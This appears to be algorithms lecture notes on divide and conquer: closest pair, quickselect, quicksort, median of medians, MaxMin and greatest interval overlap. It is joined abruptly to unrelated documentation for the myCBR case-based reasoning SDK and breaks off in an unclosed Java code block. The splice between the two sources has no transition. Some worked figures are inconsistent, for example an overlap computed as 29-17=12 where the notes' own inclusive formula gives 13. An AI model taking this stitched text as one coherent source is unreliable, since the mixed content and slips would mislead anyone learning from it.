CSE 101, WINTER 2018
DESIGN AND ANALYSIS OF ALGORITHMS
LECTURES 4 + 5: DIVIDE AND CONQUER
CLASS URL:
http://vlsicad.ucsd.edu/courses/cse101-w18/
MINIMUM DISTANCE
- Given a list of coordinates in the plane, \([(x_1, y_1), \ldots, (x_n, y_n)]\), find the distance between the closest pair.
\[
\text{distance}\big((x_i, y_i), (x_j, y_j)\big) = \sqrt{(x_i - x_j)^2 + (y_i - y_j)^2}
\]
Brute force solution?
\[
\begin{align*}
&\text{min} := \infty \\
&\text{for } i \text{ from } 1 \text{ to } n-1: \\
&\quad \text{for } j \text{ from } i+1 \text{ to } n: \\
&\quad \quad \text{if } \text{min} > \text{distance}\big((x_i, y_i), (x_j, y_j)\big): \\
&\quad \quad \quad \text{min} := \text{distance}\big((x_i, y_i), (x_j, y_j)\big) \\
&\text{return min}
\end{align*}
\]
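The brute force translates directly; here is a minimal Python sketch (note the minimum must start at infinity, not 0; the function name is mine):

```python
import math

def min_distance(points):
    """Brute-force closest pair: compare every pair, O(n^2)."""
    best = math.inf  # start at infinity, not 0
    n = len(points)
    for i in range(n - 1):
        for j in range(i + 1, n):
            (xi, yi), (xj, yj) = points[i], points[j]
            d = math.hypot(xi - xj, yi - yj)
            if d < best:
                best = d
    return best

min_distance([(0, 0), (3, 4), (1, 1)])  # ≈ 1.414, from the pair (0,0), (1,1)
```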
MINIMUM DISTANCE
- Base case.
- Break the problem up.
- Recursively solve each problem.
“Assume the algorithm works for the subproblems”
- Combine the results.
BASE CASE
- if \( n=2 \) then return \( \text{distance}((x_1, y_1), (x_2, y_2)) \)
BREAK THE PROBLEM INTO SMALLER PIECES
- Usually the smaller pieces are each of size n/2.
- We will break the problem in half. Sort the points by their $x$ values.
- Then find a value $x_m$ such that half of the $x$ values are on the left and half are on the right.
- Perform the algorithm on each side.
- “Assume our algorithm works!!”
- What does that give us?
It gives us the distances of the closest pairs on the left and on the right; let's call them $d_L$ and $d_R$.
EXAMPLE
[Figure: points split at $x_m$; closest pair on the left at distance $d_L$, on the right at $d_R$.]
How will we use this information to find the distance of the closest pair in the whole set?
\[ \text{Naive: } (\frac{n}{2})(\frac{n}{2}) = O(n^2) \]
We must consider if there is a closest pair where one point is in the left half and one is in the right half.
How do we do this?
Let $d = \min(d_L, d_R)$ and compare only the points $(x_i, y_i)$ such that $x_m - d \leq x_i$ and $x_i \leq x_m + d$.
Worst case, how many points could this be?
Let $P_m$ be the set of points within $d$ of $x_m$.
Then $P_m$ may contain as many as $n$ different points.
So, to compare all the points in $P_m$ with each other would take $\binom{n}{2}$ many comparisons.
So the runtime recursion is:
\[
T(n) = 2T\left(\frac{n}{2}\right) + O(n^2)
\]
Can we improve the combine term?
EXAMPLE
[Figure: the strip of width $2d$ around $x_m$, where $d = \min(d_L, d_R)$.]
Given a point \((x, y) \in P_m\), let’s look in a \(2d \times d\) rectangle with that point at its upper boundary:
How many points could possibly be in this rectangle?
There cannot be more than 8 points total, because if we divide the rectangle into 8 squares of size \(\frac{d}{2} \times \frac{d}{2}\), there can never be more than one point per square.
Why??? Two points in the same square lie on the same side of \(x_m\) and are at most \(\frac{d}{\sqrt{2}} < d\) apart, contradicting that \(d\) is the minimum distance on each side.
So instead of comparing \((x, y)\) with every other point in \(P_m\), we only have to compare it with the next 7 points lower than it.
To gain quick access to these points, let’s sort the points in \(P_m\) by \(y\) values.
Now, if there are \(k\) vertices in \(P_m\) we have to sort the vertices in \(O(k \log k)\) time and make at most \(7k\) comparisons in \(O(k)\) time for a total combine step of \(O(k \log k)\).
But we said in the worst case, there are \(n\) vertices in \(P_m\) and so worst case, the combine step takes \(O(n \log n)\) time.
Runtime recursion:
$$T(n) = 2T\left(\frac{n}{2}\right) + O(n \log n)$$
Recall the summation form behind the Master Theorem:
\[ T(n) = O \left( n^d \sum_{k=1}^{\log_b n} \left( \frac{a}{b^d} \right)^k \right) \]
$$T(n) = O(n \log^2 n)$$
Can anyone improve on this runtime?
Preprocess: sort the points once by $x$ and once by $y$, so the strip never needs re-sorting. Then the combine step is $O(n)$:
\[ T(n) = 2T\left(\frac{n}{2}\right) + O(n) \Rightarrow T(n) = O(n \log n). \]
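The whole scheme (sort once by $x$ and by $y$, recurse, then scan the strip) can be sketched in Python. This is my own sketch, not the slides' code; it assumes the input points are distinct, and for simplicity each strip point is compared with its next 7 neighbors by $y$:

```python
import math

def closest_pair(points):
    """Divide-and-conquer closest pair; assumes distinct points."""
    Px = sorted(points)                      # sorted by x (once)
    Py = sorted(points, key=lambda p: p[1])  # sorted by y (once)
    return _closest(Px, Py)

def _closest(Px, Py):
    n = len(Px)
    if n <= 3:  # base case: brute force
        return min((math.hypot(p[0] - q[0], p[1] - q[1])
                    for i, p in enumerate(Px) for q in Px[i + 1:]),
                   default=math.inf)
    mid = n // 2
    xm = Px[mid][0]
    Lx, Rx = Px[:mid], Px[mid:]
    Lset = set(Lx)                           # distinct points assumed here
    Ly = [p for p in Py if p in Lset]        # left half, still sorted by y
    Ry = [p for p in Py if p not in Lset]    # right half, still sorted by y
    d = min(_closest(Lx, Ly), _closest(Rx, Ry))
    # strip: points within d of the dividing line, already sorted by y
    strip = [p for p in Py if abs(p[0] - xm) < d]
    best = d
    for i, p in enumerate(strip):
        # packing argument: only the next 7 strip points can beat d
        for q in strip[i + 1:i + 8]:
            best = min(best, math.hypot(p[0] - q[0], p[1] - q[1]))
    return best
```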
The median of a list of numbers is the middle number in the list.
If the list has \( n \) values and \( n \) is odd, then the middle element is clear. It is the \( \lceil n/2 \rceil \)th smallest element.
Example:
\[
med(8,2,9,11,4) = 8
\]
because \( n = 5 \) and 8 is the 3rd = \( \lceil 5/2 \rceil \)th smallest element of the list.
If the list has \( n \) values and \( n \) is even, then there are two middle elements. Let's say that the median is the \( n/2 \)th smallest element. Then in either case the median is the \( \lceil n/2 \rceil \)th smallest element.
Example:
\[
\text{med}(10, 23, 7, 26, 17, 3) = 10
\]
because \( n = 6 \) and 10 is the 3rd = \( \lceil 6/2 \rceil \)th smallest element of the list.
The purpose of the median is to summarize a set of numbers. The *average* is also commonly used, but the median is often more typical of the data.
For example, suppose in a company with 20 employees, the CEO makes 1 million and all the other workers each make 50,000.
Then the average is 97,500 and the median is 50,000, which is much closer to the typical worker’s salary.
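These numbers are easy to check directly (using the \( \lceil n/2 \rceil \)th-smallest convention from above):

```python
# CEO makes 1 million; the other 19 employees make 50,000 each
salaries = [1_000_000] + [50_000] * 19

average = sum(salaries) / len(salaries)        # 97,500
n = len(salaries)
median = sorted(salaries)[(n + 1) // 2 - 1]    # ceil(n/2)-th smallest -> 50,000
```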
Can you think of an efficient way to find the median?
How long would it take?
Is there a lower bound on the runtime of all median selection algorithms?
Sort the list, then find the \( \lceil n/2 \rceil \)th element: \(O(n \log n)\).
You can never run faster than linear time because you at least have to look at every element.
All selection algorithms are \(\Omega(n)\)
What if we designed an algorithm that takes as input, a list of numbers of length \( n \) and an integer \( 1 \leq k \leq n \) and outputs the \( k \)th smallest integer in the list.
Then we could just plug in \( \lceil n/2 \rceil \) for \( k \) and we could find the median!!
**Quickselect.**
Let's think about selection in a divide and conquer type of way.
- Break a problem into similar subproblems
- Split the list into two sublists
- Solve each subproblem recursively
- recursively select from one of the sublists
- Combine
- determine how to split the list again.
How would you split the list?
Just splitting the list down the middle does not help so much.
What we will do is pick a random “pivot” and split the list into all integers greater than the pivot and all that are less than the pivot.
Then we can determine which list to look in to find the $k$th smallest element. (Note that the value of $k$ may change depending on which list we are looking in.)
After this is done, the pivot is in its correct position.
Example:
Selection([40, 31, 6, 51, 76, 58, 97, 37, 86, 31, 19, 30, 68], 7)
Pick a random pivot, say \(v = 31\):
S_L: 6 19 30
S_v: 31 31
S_R: 40 51 76 58 97 37 86 68
Since \(7 > |S_L| + |S_v| = 5\), recurse on the right: = Selection(S_R, 7 − 5) = Selection(S_R, 2)
Input: list of integers and integer $k$
Output: the $k$th smallest number in the set of integers.
```
function Selection(a[1…n], k)
  if n = 1:
    return a[1]
  pick a random element v from the list
  split the list into S_L (elements < v), S_v (elements = v), S_R (elements > v)
  if k ≤ |S_L|:
    return Selection(S_L, k)
  else if k ≤ |S_L| + |S_v|:
    return v
  else:
    return Selection(S_R, k − |S_L| − |S_v|)
```
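The pseudocode above maps almost line for line onto Python (the `median` helper is mine, just plugging in \(k = \lceil n/2 \rceil\)):

```python
import random

def selection(a, k):
    """Return the k-th smallest element of a (1-indexed), per the pseudocode."""
    if len(a) == 1:
        return a[0]
    v = random.choice(a)           # random pivot
    SL = [x for x in a if x < v]   # strictly smaller than the pivot
    Sv = [x for x in a if x == v]  # equal to the pivot
    SR = [x for x in a if x > v]   # strictly larger than the pivot
    if k <= len(SL):
        return selection(SL, k)
    if k <= len(SL) + len(Sv):
        return v
    return selection(SR, k - len(SL) - len(Sv))

def median(a):
    """Median via selection: plug in k = ceil(n/2)."""
    return selection(a, (len(a) + 1) // 2)
```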
The runtime depends on how big $|SL|$ and $|SR|$ are.
If we were so lucky as to choose $v$ to be close to the median every time, then $|SL| \approx |SR| \approx n/2$. And so, no matter which set we recurse on,
$$T(n) = T\left(\frac{n}{2}\right) + O(n)$$
And by the Master Theorem:
$$T(n) = O(n).$$
Conversely, if we were so unlucky as to choose $v$ to be the maximum (resp. minimum) then $|SL|$ (resp. $|SR|$) = n-1 and
$$T(n) = T(n - 1) + O(n)$$
Which is $O(n^2)$, worse than sorting then finding.
So is it worth it even though there is a chance of having a high runtime?
If you randomly select the \( i \)th element, then your list will be split into a list of length \( i \) and a list of length \( n-i \).
So when we recurse on the smaller lists, it will take time proportional to
\[
\max(i, n - i)
\]
Clearly, the split with the smallest maximum size is when $i=\lfloor n/2 \rfloor$ and worst case is $i=n$ or $i=1$.
What is the expected runtime?
Well what is our random variable?
For each input and sequence of random choices of pivots, the random variable is the runtime of that particular outcome.
So if we want to find the expected runtime, we must sum over all possibilities of choices.
Let $ET(n)$ be the expected runtime. Then
$$ET(n) = \frac{1}{n} \sum_{i=1}^{n} ET(\max(i, n - i)) + O(n)$$
What is the probability of choosing a value from 1 to $n$ in the interval $\left[ \frac{n}{4}, \frac{3n}{4} \right]$ if all values are equally likely?
If you did choose a value between \( n/4 \) and \( 3n/4 \) then the sizes of the subproblems would both be \( \leq \frac{3n}{4} \).
Otherwise, the subproblems would be \( \leq n \).
So we can compute an upper bound on the expected runtime.
\[
ET(n) \leq \frac{1}{2} ET \left( \frac{3n}{4} \right) + \frac{1}{2} ET(n) + O(n)
\]
Rearranging, \( \frac{1}{2} ET(n) \leq \frac{1}{2} ET\left(\frac{3n}{4}\right) + O(n) \), i.e. \( ET(n) \leq ET\left(\frac{3n}{4}\right) + O(n) \).
Plugging into the master theorem with \( a=1, b=\frac{4}{3}, d=1 \):
\( a < b^d \) so
\[ ET(n) = O(n) \]
What have we noticed about the partitioning part of Selection?
After partitioning, the “pivot” is in its correct position in sorted order.
Quicksort takes advantage of that.
Let’s think about selection in a divide and conquer type of way.
- Break a problem into similar subproblems
- Split the list into two sublists by partitioning around a pivot
- Solve each subproblem recursively
- recursively sort each sublist
- Combine
- concatenate the lists.
procedure quicksort(a[1…n])
if n ≤ 1:
return a
set v to be a random element in a.
partition a into SL, Sv, SR
return quicksort(SL) ∘ Sv ∘ quicksort(SR)
QUICKSORT (RUNTIME)
Expected Runtime of QSort
\[ O(n \log n) \]
(Exercise)
quicksort(60, 82, 20, 10, 7, 85, 89, 94, 33, 53, 14, 75)
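The quicksort pseudocode, sketched in Python (concatenation plays the role of \(\circ\)):

```python
import random

def quicksort(a):
    """Randomized quicksort, per the pseudocode above."""
    if len(a) <= 1:
        return a
    v = random.choice(a)           # random pivot
    SL = [x for x in a if x < v]
    Sv = [x for x in a if x == v]  # pivot copies land in their final position
    SR = [x for x in a if x > v]
    return quicksort(SL) + Sv + quicksort(SR)

quicksort([60, 82, 20, 10, 7, 85, 89, 94, 33, 53, 14, 75])
# [7, 10, 14, 20, 33, 53, 60, 75, 82, 85, 89, 94]
```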
The selection algorithm we described is sometimes called quickselect. It is a very practical algorithm with expected linear runtime, and it is used in practice.
For theoretic computer scientists, it is unsatisfactory to only have a randomized algorithm that could run in quadratic time.
Blum, Floyd, Pratt, Rivest, and Tarjan developed a deterministic approach to finding the median (or any \(k\)th smallest element).
They use a divide and conquer strategy to find a number close to the median and then use that to pivot the values.
The strategy is to split the list into sets of 5 and find the medians of all those sets. Then find the median of the medians using a recursive call $T(n/5)$.
Then partition the set just like in quickselect and recurse on SR or SL just like in quickselect.
By construction, it can be shown that $|SR|<7n/10$ and $|SL|<7n/10$ and so no matter which set we recurse on, we have
$$T(n) = T\left(\frac{n}{5}\right) + T\left(\frac{7n}{10}\right) + O(n)$$
You cannot use the master theorem to solve this, but you can use induction to show that $T(n) \leq cn$ for some constant $c$ (this works because $\frac{1}{5} + \frac{7}{10} < 1$).
And so we have a linear time selection algorithm!!!!!
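A sketch of the median-of-medians (BFPRT) scheme just described; the function name is mine, and lists of at most 5 elements are simply sorted:

```python
def select_bfprt(a, k):
    """Deterministic k-th smallest (1-indexed) via median of medians."""
    if len(a) <= 5:
        return sorted(a)[k - 1]
    # medians of the groups of 5
    groups = [a[i:i + 5] for i in range(0, len(a), 5)]
    medians = [sorted(g)[len(g) // 2] for g in groups]
    # pivot = median of the medians, found by a recursive call (cost T(n/5))
    v = select_bfprt(medians, (len(medians) + 1) // 2)
    # partition just like in quickselect
    SL = [x for x in a if x < v]
    Sv = [x for x in a if x == v]
    SR = [x for x in a if x > v]
    if k <= len(SL):
        return select_bfprt(SL, k)
    if k <= len(SL) + len(Sv):
        return v
    return select_bfprt(SR, k - len(SL) - len(Sv))
```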
THE MAXMIN PROBLEM
- **MaxMin**: Given list of n numbers, return largest and smallest
- **Naïve**: 2(n-1) comparisons (two passes)
DC approach:
- Divide the problem
- Recursively solve each subproblem
- “Combine”
- **DQ approach**
- \( n = 1 \rightarrow 0 \) comparisons needed
- \( n = 2 \rightarrow 1\) comparison needed
- else: bisect list
- make recursive calls
- return \( \max(\max_1, \max_2), \min(\min_1, \min_2) \)
- **#comparisons**: \( T(n) = T(\lfloor n/2 \rfloor) + T(\lceil n/2 \rceil) + 2, \ n > 2 \)
“Information argument”
- Start: Nothing known about $n$ elements
- End: “Neither Max nor Min” known about all but 2 elements
Four “buckets”
- Know Nothing
- Not Max
- Not Min
- Neither Max nor Min
$$\frac{n}{2} + 2\left(\frac{n}{2} - 1\right) = \frac{3n}{2} - 2$$
DQ FOR THE MAXMIN PROBLEM
- $T(n) = T(\lfloor n/2 \rfloor) + T(\lceil n/2 \rceil) + 2$, $n > 2$
- Transform with $S(k) = T(2^k)$
\[
S(k) = 2S(k-1) + 2
\]
\[
S(k) - 2S(k-1) = 2 = 1^k \cdot 2
\]
C.P. = $(x - 2)(x - 1)$ with roots 2, 1
\[
S(k) = c_12^k + c_21^k
\]
Initial Conditions
\[
S(1) = c_1 \cdot 2 + c_2 = 1
\]
\[
S(2) = c_1 \cdot 4 + c_2 = 4
\]
\( \Rightarrow c_1 = 3/2, \; c_2 = -2 \)
\[
T(n) = T(2^k) = S(k) = \frac{3}{2} \cdot 2^{\log_2 n} - 2 = \frac{3n}{2} - 2
\]
**Note:** In general, the recurrence \( a_0 t_n + a_1 t_{n-1} + \ldots + a_k t_{n-k} = b^n p(n) \), where \( p \) is a polynomial of degree \( d \), has solution \( t_n = \sum_{i} c_i r_i^n \), where the \( r_i \) are the roots of the C.P.: \( (a_0 x^k + a_1 x^{k-1} + \ldots + a_k)(x - b)^{d+1} = 0 \).
Here \( S(k) - 2S(k-1) = 1^k \cdot 2 \) gives \( a_0 = 1, \ a_1 = -2, \ b = 1, \ p(k) = 2, \ d = 0 \), so the C.P. is \( (x-2)(x-1) \) and \( S(k) = c_1 2^k + c_2 1^k \), as above.
(assuming \( n = 2^k \), i.e., \( n \) a power of 2)
\[
\begin{align*}
S(1) &= T(2) = 1 \\
S(2) &= T(4) = T(2) + T(2) + 2 = 4
\end{align*}
\]
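The DQ scheme for MaxMin can be sketched in Python, counting element comparisons to check the \(3n/2 - 2\) bound (the function name is mine):

```python
def maxmin(a):
    """D&C MaxMin; returns ((max, min), number of element comparisons)."""
    n = len(a)
    if n == 1:
        return (a[0], a[0]), 0                 # 0 comparisons needed
    if n == 2:                                  # 1 comparison needed
        pair = (a[0], a[1]) if a[0] > a[1] else (a[1], a[0])
        return pair, 1
    mid = n // 2                                # else: bisect list
    (max1, min1), c1 = maxmin(a[:mid])          # recursive calls
    (max2, min2), c2 = maxmin(a[mid:])
    # combine: 2 more comparisons
    return (max(max1, max2), min(min1, min2)), c1 + c2 + 2

(mx, mn), comps = maxmin([5, 1, 9, 3, 7, 2, 8, 6])  # n = 8, a power of 2
# comps == 3*8//2 - 2 == 10
```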
Given a list of intervals \([a_1, b_1], \ldots, [a_n, b_n]\) write pseudocode for a D/C algorithm that outputs the length of the greatest overlap between two intervals.
An interval \([a, b]\) is a set of integers starting at \(a\) and ending at \(b\). For example: \([16, 23]\) = \{16, 17, 18, 19, 20, 21, 22, 23\}
An overlap between two intervals \([a, b]\) and \([c, d]\) is their intersection.
Given two intervals \([a, b]\) and \([c, d]\), how would you compute the length of their overlap?
procedure overlap([a,b],[c,d]) [Assume that \(a \leq c\)]
- if \(b < c\):
- return 0
- else:
- if \(b \leq d\):
- return \(b - c + 1\)
- if \(b > d\):
- return \(d - c + 1\)
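The procedure translates directly to Python; sorting the two interval tuples enforces the \(a \leq c\) assumption, and `min(b, d)` merges the last two cases:

```python
def overlap(i1, i2):
    """Length of the intersection of two integer intervals [a,b] and [c,d]."""
    (a, b), (c, d) = sorted([i1, i2])  # ensure a <= c
    if b < c:
        return 0                       # disjoint
    return min(b, d) - c + 1           # covers both b <= d and b > d
```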
DIVIDE AND CONQUER EXAMPLES (GREATEST OVERLAP.)
- Given a list of intervals \([a_1, b_1], \ldots, [a_n, b_n]\), write pseudocode for a D/C algorithm that outputs the length of the greatest overlap between two intervals.
- Example: What is the greatest overlap of the intervals:
- \([45, 57], [17, 50], [10, 29], [12, 22], [23, 51], [31, 32], [10, 15], [27, 35]\)
Given a list of intervals \([a_1, b_1], \ldots [a_n, b_n]\) write pseudocode for a D/C algorithm that outputs the length of the greatest overlap between two intervals.
Simple solution:
\[
\text{olap}:=0
\]
\[\text{for } i \text{ from } 1 \text{ to } n-1\]
\[\text{for } j \text{ from } i+1 \text{ to } n\]
\[\text{if overlap}([a_i,b_i],[a_j,b_j]) > \text{olap} \text{ then}\]
\[\text{olap}:=\text{overlap}([a_i,b_i],[a_j,b_j])\]
\[\text{return } \text{olap}\]
What is the runtime? \(O(n^2)\)
Can we do better? maybe...
Given a list of intervals \([a_1, b_1], \ldots [a_n, b_n]\) write pseudocode for a D/C algorithm that outputs the length of the greatest overlap between two intervals.
- Compose your base case
- Break the problem into smaller pieces
- Recursively call the algorithm on the smaller pieces
- Combine the results
What happens if there is only one interval?
if $n=1$ then return 0
The question here is “Would knowing the result on smaller problems help with knowing the solution on the original problem?”
(In this stage, let’s keep the combine part in mind.)
How would you break the problem into smaller pieces?
Would it be helpful to break the problem into two depending on the starting value?
Can you determine the greatest overlap where one interval is red and one is blue?
Break the problem into smaller pieces.
- Sort the list and break it into lists each of size \( n/2 \).
- \([10,15],[10,29],[12,22],[17,50],[23,51],[27,35],[31,32],[45,57]\)
Let’s assume we can get a DC algorithm to work. Then what information would it give us to recursively call each subproblem?
- overlapDC([10,15],[10,29],[12,22],[17,50])=12
- overlapDC([23,51],[27,35],[31,32],[45,57])=8
Is this enough information to solve the problem? What else must we consider?
29-17=12
35-27=8
- The greatest overlap overall may be contained entirely in one sublist, or it may be an overlap of one interval from each side.
So far we have split up the set of intervals and recursively called the algorithm on both sides. The runtime of this algorithm satisfies a recurrence that looks something like this.
\[ T(n) = 2T\left(\frac{n}{2}\right) + O(\ldots) \]
What goes into the \( O(\ldots) \)?
How long does it take to “combine”? In other words, how long does it take to check whether there is a bigger overlap between the sublists?
What is an efficient way to determine the greatest overlap of intervals where one is red and the other is blue?
Let’s formalize our algorithm that finds the greatest overlap of two intervals such that they come from different sets sorted by starting point.
procedure overlapbetween (\([a_1, b_1], \ldots [a_\ell, b_\ell], [c_1, d_1], \ldots [c_k, d_k]\))
\((a_1 \leq a_2 \leq \cdots \leq a_\ell \leq c_1 \leq c_2 \leq \cdots \leq c_k)\)
- if \(k=0\) or \(\ell = 0\) then return 0.
- minc = c₁
- maxb = 0
- olap = 0
- for i from 1 to ℓ:
- if maxb < bᵢ:
- maxb = bᵢ
- for j from 1 to k:
- if olap < overlap([minc, maxb], [c_j, d_j]):
- olap = overlap([minc, maxb], [c_j, d_j])
- return olap
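The same idea in Python: the only left interval that matters is the one reaching furthest right (maxb), and replacing its start with minc = \(c_1\) preserves the \(a \leq c\) precondition without changing any overlap length. The helper `overlap_len` re-implements the earlier overlap procedure so this sketch is self-contained; the names are mine:

```python
def overlap_len(i1, i2):
    """Length of the intersection of two integer intervals."""
    (a, b), (c, d) = sorted([i1, i2])  # ensure a <= c
    return 0 if b < c else min(b, d) - c + 1

def overlapbetween(left, right):
    """Greatest overlap with one interval from `left` and one from `right`;
    assumes every start in `left` is <= every start in `right`."""
    if not left or not right:
        return 0
    minc = right[0][0]                  # smallest start on the right
    maxb = max(b for _, b in left)      # left endpoint reaching furthest right
    return max(overlap_len((minc, maxb), r) for r in right)
```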
Given a list of intervals \([a_1, b_1], \ldots, [a_n, b_n]\), write pseudocode for a D/C algorithm that outputs the length of the greatest overlap between two intervals.
procedure overlapdc(\([a_1, b_1], \ldots, [a_n, b_n]\))
▪ if n==1 then return 0.
▪ sort \([a_1, b_1], \ldots, [a_n, b_n]\) by \(a\) values.
▪ mid = \(\lfloor n/2 \rfloor\)
▪ LS = \([a_1, b_1], \ldots, [a_{mid}, b_{mid}]\)
▪ RS = \([a_{mid+1}, b_{mid+1}], \ldots, [a_n, b_n]\)
▪ olap1 = overlapdc(LS)
▪ olap2 = overlapdc(RS)
▪ olap3 = overlapbetween(LS, RS)
▪ return max(olap1, olap2, olap3)
GREATEST OVERLAP RUNTIME.
\[ T(n) = 2T \left( \frac{n}{2} \right) + O(n \log n) \]
**procedure overlapdc**(\([a_1, b_1], \ldots, [a_n, b_n]\)) [input already sorted by \(a\) values]
- if \(n=1\) then return 0.
- \(\text{mid} = \lfloor n/2 \rfloor\)
- \(\text{LS} = [[a_1, b_1], \ldots [a_{\text{mid}}, b_{\text{mid}}]]\)
- \(\text{RS} = [[a_{\text{mid}+1}, b_{\text{mid}+1}], \ldots [a_n, b_n]]\)
- \(\text{olap1} = \text{overlapdc}(\text{LS})\)
- \(\text{olap2} = \text{overlapdc}(\text{RS})\)
- \(\text{olap3} = \text{overlapbetween}(\text{LS}, \text{RS})\)
- return \(\max(\text{olap1}, \text{olap2}, \text{olap3})\)
If you sort first and then run the overlapdc algorithm, you will have:
Sorting first:
\[ S(n) = O(n \log n) \]
\[ T(n) = 2T \left( \frac{n}{2} \right) + O(n) \]
Total runtime = \( O(n \log n) + O(n \log n) = O(n \log n) \)
It is clear that the greatest overlap will be from two intervals in the left half, two from the right half, or one from the left and one from the right.
Our algorithm finds all three of these values and outputs the max.
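Putting the pieces together (sort once, then recurse) gives a self-contained sketch; the helper names are mine, and overlap lengths count integer points (inclusive endpoints), as in the overlap procedure:

```python
def greatest_overlap(intervals):
    """Sort once by start, then divide and conquer: O(n log n) overall."""
    def olen(p, q):
        (a, b), (c, d) = sorted([p, q])        # ensure a <= c
        return 0 if b < c else min(b, d) - c + 1

    def between(left, right):
        # greatest overlap with one interval from each side
        if not left or not right:
            return 0
        minc, maxb = right[0][0], max(b for _, b in left)
        return max(olen((minc, maxb), r) for r in right)

    def dc(iv):
        n = len(iv)
        if n == 1:
            return 0
        mid = n // 2
        LS, RS = iv[:mid], iv[mid:]
        return max(dc(LS), dc(RS), between(LS, RS))

    return dc(sorted(intervals))

greatest_overlap([(1, 4), (3, 8), (10, 12)])  # 2
```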
myCBR Documentation
Competence Center for Case-based reasoning, DFKI, Kaiserslautern
Centre for model-based software engineering and explanation-aware computing, University of West London, UK
SDK for building and integrating CBR systems
Table of Contents
- What is CBR
- Knowledge formalisation in CBR
- The CBR cycle (the four R’s)
- CBR areas of application
- What's myCBR
- Architecture diagram
- myCBR sources and documentation
- Prerequisites
- Prerequisites for development
- Information for developers
- How to install myCBR (getting started)
- How to install within Eclipse (for Developers)
- What and How to start
- myCBR Application design
- myCBR SDK integration
- myCBR the workbench GUI explained
- myCBR getting started: modelling your domain knowledge
- myCBR getting started: refining your knowledge model
What is CBR
**The assumption of CBR:** Similar problems have similar solutions
**The general approach:** Experiences are stored as cases with a problem description part and a solution part
**To solve a new problem:** The formal problem description is presented to the CBR system. Then similar cases with similar problem descriptions are retrieved by the system. The experience (solution part) of the most similar case is then reused to solve the new problem presented to the system.
What is CBR
*The knowledge formalisation for CBR: Knowledge Containers*
**Similarity Measures**
The retrieval of similar cases is based upon the use of similarity functions (or measures) to compute the distance or similarity of two cases.
**Case base**
The system’s experience is stored as cases within the case base, which can be seen as a special form of a database.
**Vocabulary**
The cases themselves, the similarity measures and the adaptation knowledge are composed upon a vocabulary that contains the objects of interests (terms, attributes, concepts).
**Adaptation knowledge**
Adaptation knowledge is used whenever a retrieved case’s solution has to be adapted to be suitable to solve the presented problem. An example for this kind of knowledge is given by adaptation rules like “If X is not available use Y instead.”
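The role of local similarity measures and their weighted combination can be illustrated with a small standalone sketch, independent of the myCBR API. All attribute names, ranges and weights below are illustrative assumptions:

```java
// Standalone sketch (not myCBR code): a global similarity computed as a
// weighted sum of local, per-attribute similarities.
public class GlobalSimilarity {

    // Local similarity of two prices: linear decay over an assumed range.
    public static double priceSim(double a, double b) {
        double maxDist = 10000.0; // assumed maximum relevant price distance
        return Math.max(0.0, 1.0 - Math.abs(a - b) / maxDist);
    }

    // Local similarity of two colors: 1.0 on exact match, 0.0 otherwise.
    public static double colorSim(String a, String b) {
        return a.equals(b) ? 1.0 : 0.0;
    }

    // Global similarity: weighted sum of the local similarities.
    public static double globalSim(double priceA, String colorA,
                                   double priceB, String colorB) {
        double wPrice = 0.7, wColor = 0.3; // illustrative weights, sum = 1.0
        return wPrice * priceSim(priceA, priceB)
             + wColor * colorSim(colorA, colorB);
    }
}
```

With these weights, two green cars whose prices differ by 2000 score 0.7 · 0.8 + 0.3 · 1.0 = 0.86.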
Examples of CBR in human reasoning
- A medical doctor remembers the case history of another patient.
- A lawyer argues with similar original precedence.
- An architect studies the construction of existing buildings to base his new designs on it.
- A work scheduler remembers the construction steps of a similar work piece.
- A mathematician tries to transfer a known proof to a new problem.
- A service technician remembers a similar defect at another device.
- A salesperson recommends similar products to similar customers.
The four steps of the CBR cycle: The 4 R’s
**Retrieve:** the most similar case or cases: The case(s) with the most similar problem description(s)
**Reuse:** the information/experience stored in the solution descriptions of the retrieved case(s) to solve the presented problem
**Revise:** the retrieved solution if it is necessary to solve the presented problem in a satisfying way
**Retain:** the tested adapted new solution/experience as a new case, consisting of the presented problem description and the adapted solution description as a new experience in the case base
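The four steps can be sketched in plain Java (requires Java 16+ for records). This is a toy illustration only: the one-dimensional problem description, the nearest-neighbour retrieval and the adaptation rule are all invented for the example, not taken from myCBR.

```java
import java.util.ArrayList;
import java.util.Comparator;
import java.util.List;

// Toy sketch of the CBR cycle: retrieve, reuse, revise, retain.
public class CbrCycle {

    // A case: a problem description part and a solution part.
    public record Case(double problem, String solution) {}

    static final List<Case> caseBase = new ArrayList<>(List.of(
            new Case(10.0, "use tool A"),
            new Case(50.0, "use tool B")));

    // Retrieve: the case with the most similar (here: closest) problem.
    static Case retrieve(double problem) {
        return caseBase.stream()
                .min(Comparator.comparingDouble(c -> Math.abs(c.problem() - problem)))
                .orElseThrow();
    }

    // Reuse and revise: reuse the retrieved solution, revising it when the
    // retrieved problem is not an exact match.
    static String reuseAndRevise(Case retrieved, double problem) {
        String solution = retrieved.solution();            // reuse
        if (retrieved.problem() != problem) {
            solution = solution + " (adapted)";            // revise
        }
        return solution;
    }

    // One pass through the cycle; retain stores the new experience.
    public static String solve(double problem) {
        Case best = retrieve(problem);
        String solution = reuseAndRevise(best, problem);
        caseBase.add(new Case(problem, solution));         // retain
        return solution;
    }
}
```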
Applications of CBR
CBR is capable of *automating* the tasks of *planning, diagnosis, design* and *recommending*.
It is used in a wide variety of successful business solutions. At the current time CBR is one of the most used AI methodologies within commercial applications.
Application possibilities/analogies for CBR:
- A medical doctor remembers the case history of another Patient
- A lawyer argues with similar original precedence
- An architect studies the construction of existing building
- A work scheduler remembers the construction steps of a similar work piece
- A mathematician tries to transfer a known proof to a new problem
- A service technician remembers a similar defect at another device
What is myCBR
SDK for building and integrating CBR systems
**myCBR is an open-source case-based reasoning tool hosted at DFKI**
myCBR enables you to build CBR systems and their knowledge and to use them in your applications.
Its aims are:
- to be easy to use
- to enable fast prototyping
- to be extendable and adaptable
- to integrate state-of-the-art CBR functionality
myCBR supports the teaching and research of the CBR approach by offering an easy way to prototype CBR engines.
*You can download the latest version here:* [http://mycbr-project.net/download.html](http://mycbr-project.net/download.html)
myCBR is developed as open source software currently by these Institutions:
- Competence Center for Case-based reasoning at the German Research Center for Artificial Intelligence
- Centre for model-based software engineering and explanation-aware computing at the University of West London
SDK for building and integrating CBR systems
Current Features of myCBR
- Powerful GUIs for modelling knowledge-intensive similarity measures
- Similarity-based retrieval functionality
- Export of domain model (including similarity measures) in XML
- Extension to structured object-oriented case representations, including helpful taxonomy editors
- Powerful textual similarity modelling
- Scriptable similarity measures using Jython
- Rapid prototyping via CSV
- Improved scalability
- Simple data model (applications can easily be built on top)
- Fast retrieval results
- Rapid loading of large case bases
```java
// add a case base to the project
